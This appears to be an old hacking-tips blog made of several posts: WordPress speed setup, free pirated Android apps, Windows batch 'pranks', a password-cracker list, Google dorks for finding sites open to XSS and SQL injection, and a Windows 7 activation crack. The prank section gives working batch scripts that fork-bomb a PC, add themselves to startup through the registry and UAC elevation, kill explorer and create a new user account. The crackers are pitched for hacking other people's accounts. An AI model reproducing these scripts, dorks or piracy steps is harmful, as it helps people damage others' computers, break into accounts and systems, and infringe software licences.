Wednesday 23 October 2013

Complete Guide to Supercharge your WordPress Site

If you search the net for stuff like Speed up WordPress blog you are bound to find articles on eg. Cloudflare, NetDNA, MaxCDN ETC. Or you might find ways to make your site better by using configurations like caching your website and minifying your JavaScript’s which are not only difficult to setup but also create problems like malfunctioning site ETC. And that is why i have bought you the easiest and the best solution for all your speed issues – [highlight type="yellow"] Google[/highlight]
Yes Google… Google can make all things work for you in a matter of 3-4 hours. And i will tell you exactly how you can set up your Google pagespeed service on your WordPress blog. My proof 

1. Apply for Google Pagespeed

Visit this link and click on signup and apply. Fill in your details and you are ready to go.
Note: Google may or may not  accept your website or it may take up to 1-2 days to get accepted. For me it took about 30 Minutes after which my Google pagespeed application was accepted.

2. Deploy Google Pagespeed

One accepted you will receive a message like this one…
Google Pagespeed Service
My site got accepted :)
[highlight type="yellow"] Note: See last line it has been given that Google pagespeed is not a free service. But as we all know Google, its plans and pricing are pretty reasonable and effective so there is no reason to worry about it. Also that this service is free of cost now so there is no harm in trying it [/highlight]
Coming back to the topic – Deploy It is quite simple to deploy it that is if you are not using a CDN or cloudflare as your name servers.

Deploy Google pagespeed on a normal scenario

This is just a one step simple procedure that requires you to edit your DNS records. The steps are as below
1. Login to your website’s Cpannel
2.  Next click on “Advanced DNS Zone Editor” which will open a new page
3. DNS editor
Edit that highlighted record with the www. in front of your Domain and change the value to whatever Google instructs you to. Like this one pagespeed2
If asked for TTL then just enter the TTl value as 1440.
You might be wondering why I asked you to delete that mail.ashtricks.com entry that directed to Gmail. Well that is because of the limitations in Google Pagespeed which are as follows-
  • If you are unable to create a DNS TXT record to confirm ownership of your domain with Google you cannot use PageSpeed Service. There is another option available from Google called “mod_service” if your site runs Apache, however.
  • If Google’s Pagespeed site goes down, traffic to your site will be impacted. You should have a plan in place to update your DNS records accordingly if needed. You may want to examine your TTL (time to live) settings which control how long other hosts cache your DNS records so that if you need to make an emergency adjustment repeat visitors will quickly be directed to the appropriate target host.
  • PageSpeed has to be set up for your full domain (e.g. www.mysite.com – if you have a “bare” domain which points to your full domain (e.g. mysite.com) you’ll need to use a server-side redirect (301 redirect) to send traffic to the full domain. This may already be in place for many sites, however.
  • PageSpeed will work with secure sites using https but you must contact pss-support@google.com for details on how to set this up.
  • Google warns that: “Once a domain is CNAME’d to Google, it is not possible to simply exclude HTTPS traffic from PageSpeed Service. To achieve that, you need to serve your HTTPS traffic from a separate sub-domain that is not CNAME’d to Google. For example, if your site is www.example.com, then serve HTTPS traffic from secure.example.com. If the domain being CNAME’d to Google supports other services (e.g. ssh, ftp etc.), those services will no longer work.”
  • And google will not work on bare domains and only on www domains(Will show the remedy later in this post)
  • [highlight type="red"] And lastly Google pagespeed wont work if you are using Gmail as your custom mail (Google Apps) I recommend going for outlook. [/highlight]

Deploy Google Pagespeed with cloudflare

Use the settings exactly as follows and you will have a up and running Google pagespeed service
cloudflaresettings
Note: Important 
Using W3Total Cache plugin Disable all minification ETC from cloudflare and also disable a CDN if any !!
All these should do the trick and make your website faster but that will only happen if your W3total cache settings are correct
Here’s what you should enable and disable–
Page Cache – Enable
minify -Enable
Cloudflare – Enable but disable all other options under it (off) and security medium or low
Database Cache – Enable
Object Cache -Enable
Browser Cache-  Enable
Done :)

Hope you liked this post.

Get Paid Android Apps For Free

Android is the the operating system that is widely used across the world and i dont think anyone would like an introduction to it.  So here i give you the best methods out there to get paid apps for free in Android. Hope you have read my previous article on activating Windows 8 trial app. So the app downloading centers are ..

1. Amazon App Store

The amazon app store allows you to download paid apps for free. For example..AmazonStore  So if you are lucky one day you might even get a costly app and that too for free.

2. 4Shared

4 Shared has the largest collection of Apk files that will let you download it for free. To be able to install the apk files just do the following
1. Go to “Settings”
2. Scroll down and tap “Application”
3. Make sure the “Unknown Sources” is ticked/checked
Once this is done you can easily download and install apps for example I choose “Need for speed most wanted”
Go to m.4shared.com and type in the file name and click on the first link some thing like this should appear
4shared

BLACK MART Android app store


This application enables you to download any paid application and games for free. This app is quite easy to use and user friendly that you are able to download any paid apps and games 100 % free. To get paid apps and games merely install black mart to your current cell phone. Once the app is installed open the application and search for the required application or games. After that click required app or game and simply click install

Prank Your Friends using CMD Promt

Here are some o the best and most dangerous Cmd pranks that i know of.
WARNING! The following is a tricks that you should only do to someone you know very well, that will not file charges against you for destruction of property(By Mistake of Course). You should also be prepared to completely reinstall windows and additional software, and perhaps make a complete backup of their drive so you can make it the way it was after your malicious prank has taken its toll. 

1. Fork Bomb

A fork bomb is a something  that runs in an infinite loop. Copy this to a text file and save it as “anyname”.bat (a bat extension is important)
:BEGIN
start %0
GOTO BEGIN
Now to make it more complex we can add this file to the startup, so that whenever the person restarts his computer he/she might still get a slow computer
For that we are going to make another .bat file of any other name and fill it with the following code-
if _%1_==_payload_  goto :payload

:getadmin
    echo %~nx0: elevating self
    set vbs=%temp%\getadmin.vbs
    echo Set UAC = CreateObject^("Shell.Application"^)                >> "%vbs%"
    echo UAC.ShellExecute "%~s0", "payload %~sdp0 %*", "", "runas", 1 >> "%vbs%"
    "%temp%\getadmin.vbs"
    del "%temp%\getadmin.vbs"
goto :eof

:payload
    echo %~nx0: running payload with parameters:
    echo %*
    echo ---------------------------------------------------
    cd /d %2
    shift
    shift
    rem copy "anyname.bat" %AllUsers%\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
    rem e.g.: perl myscript.pl %1 %2 %3 %4 %5 %6 %7 %8 %9
goto :eof
or the following code will also do-
@echo off
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Wi­ndows\CurrentVersion\Run /v test /t reg_sz /d C:\folder\anyname.bat
Change the file name and the location according to your preference

2. Fake Trojan

This is a safe prank as it does not do anything but scare your friend.
The code for this prank is-
@echo off
taskkill /f /im explorer.exe
color 2
:prank
pause
echo malicous malware has been detected on your computer...
pause
echo attempting to contact your local windows firewall...
pause
echo access was denied...try again
pause
echo TROJAN INSTALLED
net user hacked /add
net user hacked hacker
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
pause
echo lmao you just got pranked :p
pause
:end prank

 3. Fake Messages

Well this is another modified version of the previous one But it is more realistic and scary.
Message

for the following prank we will be needing 2 batch file One called the installer and another that hides deep within a maze of subfolders. This prank will automatically kick off once the system reboots causing much difficulties to the user. Try it yourself ;)
Installer.bat:
@echo off
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Wi­ndows\CurrentVersion\Run /v test /t reg_sz /d C:\mazeof\subfolders\Running.bat
Running.bat:
@echo off
taskkill /f /im explorer.exe
msg * Warning your computer has detected a virus.
msg * To remove the virus click OK or close this box
msg * Your Hard drives are now being formatted
msg * Please wait ...........
msg * Wait more
msg * Working
msg * Contacting kaspersky
msg * Doing Stuff...
msg * This is annoying isnt it ?
msg * Press Ok to Exit and restart
msg * Oh well that didnt work out well :P 

Thats all for now… Will be adding more in about a day or so, Till then do tell us how you used these in the comments section.

Tuesday 15 October 2013

How To Write Protect Your USB Flash Drive?


How To Write Protect Your USB Flash Drive?

USB Write Protector
Viruses spread to different computers through pen drives.The viruses are capable enough to copy itself to whatever flash drive is attached into the infected computer’s USB drive.If you write protect your USB drives deleting/Copying files or Folders on the USB drive is not Possible.Thus virus is also prevented :)
Here is a freeware utility to make your USB flash drive write protected in single click.USB Write Protector is a portable application that prevents viruses getting copied to your flash drive themselves.


Download: USB WriteProtector

TOP LATEST PASSWORDS CRACKERS | BREAKERS AND HACKING LATEST SOFTWARE FREE 2013

Top latest Passwords Crackers | Breakers And Hacking Latest Software free 2013

After a lot my Article some my reader ask me to write a tutorials on password hacking crackers and breakers. There are some best password crackers and the list made from all the password breakers from all over a Globe including the version for the operating system UNIX and window. 

Cain and Abel : (top password recovery tool for the Windows)


facebook gmail hotmail yahoo password hacking software
This is very best software for the password recovery tool that handles a enormous variety of the tasks and it can recover the password
          1.      Sniffing a network, cracking  
          2.      encrypted passwords using the Dictionary | Brute-Force      
          3.      Cryptanalysis attacks
          4.      Recording VoIP conversations
          5.      Decoding scrambled passwords
          6.      Revealing password boxes
          7.      Uncovering cached passwords and the analyzing routing protocols

So it’s very useful tool for the Recover the password and later IN SHA ALLAH I will try to write a complete tutorial on Cain and able.

 THC Hydra: 

how to recover password
This software Fast network authentication cracker to support many different services like when you need to the brute force crack the remote authentication service and Hydra is often a tool of that choice and It can perform the rapid dictionary attacks against the more than 29 protocols like including telnet, http, https, ftp, several databases and much more as you want

Air crack: 

how to hack wifi password software
The fastest available WPA | WEP Cracking Tools . This is the software is a suite of tools for the 802.11a/b/g WPA | WEP cracking. It can be recover the 40 through 512-bit WEP key once enough the encrypted packets have been gathered and It can also attack on the WPA 1 or 2 networks using the advanced cryptographic methods and by brute force. It’s very useful for the Wi-Fi so later on I will try to write article on this.

 Air snort: 

This is software for 802.11 the WEP Encryption Cracking Tool and is a wireless LAN (WLAN) so that recovers encryption keys and its operates by the passively monitoring transmissions,and its packets have gathered packet .and its similar to the Air crack.  

 Pwdump:

 
This is software for the window password recovery tool. This is software able to extract LanMan and NTLM hashes from the Windows target and then regardless of whether Syskey Is a enabled. It is also capable for the displaying password histories and if they are available.

The RainbowCrack :


hacking password rainbow crack free
The RainbowCrack tool is the hash cracker that easy makes use of the large scale time memory and its very advance software and it can store the results in called rainbow tables and It does take the long time to precompute a tables but the RainbowCrack can be the hundreds of  times the faster than the brute force cracker once precomputation is the finished.

HOW TO FIND VULNERABLE WEBSITE FOR XSS | SQLI | LFI | RFI

 How to find vulnerable website for XSS | SQLI | LFI | RFI

Most of the people search in Google or other search engine to check the vulnerable website and in the end some are successful and some are not. This is also problem for newbie who don’t know how to check the vulnerable website.in starting When I was also found vulnerable website. so its very difficult for me and then later on I have researched on it and Now i make some Google Dorks for check vulnerable website for you.

google dorks xss sqli

So in my previous article I have explained that the top vulnerabilities and also tutorials on Cross site scripting. So it’s very easy to find vulnerable website with the help of search engine.

There are lot of dorks to check the website is it vulnerable or not. So you think that the lot of people use theseGoogle dorks already. So you have to use your mind and check some another technique also. When you search in Google you have to check below of search bar some tools. so use these tools also like I give you one example the website update in 24 hours before .  I have also search like below 

google search engine tricks

Check website for Cross site scripting XSS:

inurl:".php?search=" 

inurl:".php?searchstring="
 

inurl:search.php?q=


inurl:com_feedpostold/feedpost.php?url=


inurl:/poll/default.asp?catid=
 
 

inurl:/search_results.php?search= 
 
inurl:scrapbook.php?id=
 

inurl:headersearch.php?sid=

Check website for SQL injection SQLI:


inurl:"id=" & intext:"Warning: mysql_fetch_assoc()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: mysql_fetch_array()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: require()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()

How to check Sub domain :

If you want to find vulnerabilities of website . so you should go for sub domain. The best dork for searching subdomain is below 
Site: URL –inurl:www
Like if I want to find the subdomain of Google . so it’s like below and don’t add Http and www with the domain 
Site: google.com –inurl:www

check subdomain dorks

HOW TO MAKE WINDOW 7 IS GENUINE 100 % WORKING TRICK

Well in previously I was explained that how to make HOW TO MAKE WINDOW XP SP2 OR SP3 ISGENUINE so now finally after the request of my friend’s and Reader I can try to explain that how can you crack the window 7.

there is a software that is WAT(windows activation Technologies ) from the window 7 which is responsible for the checking the window is genuineness of window so then after removing  the WAT(windows activation Technologies)files then the system will have no need for the genuine keys that make it active cause without the  WAT(windows activation Technologies) it will always Genuine.

 REQUIREMENT AND BENEFIT Of Window 7


1) Instead of the 30 days of a trial version you can use the window 7 use for the life long

2)Its works with the all version of the window 7 
Microsoft Windows 7 Home Premium

Microsoft Windows 7 Home Basic

Microsoft Windows 7 Professional

Microsoft Windows 7 Ultimate

Microsoft Windows 7 starter

3) Its compatible with the 32 bit and also for the 64 bit file system .

IMPORTANT NOTE:

After that you will not be able to update the window and if you do so it might do inactive your window and if any update of the window find that your OS is the pirated .

So here are the crack tools

1.      1.  Remove WAT Download CLICK HERE




      HOW TO CRACK THE WINDOW


Window 7 cracker are the very easy to use that you can use it without. Having knowledge about the system now what you have to do is just simple Download the WAT (windows activation Technologies) and then

1. Extract
2. Then Open rw.exe
3. Then click on the button "remove WAT"
4. Then finally wait for your computers to the reboot then the computer no longer have to a genuine status.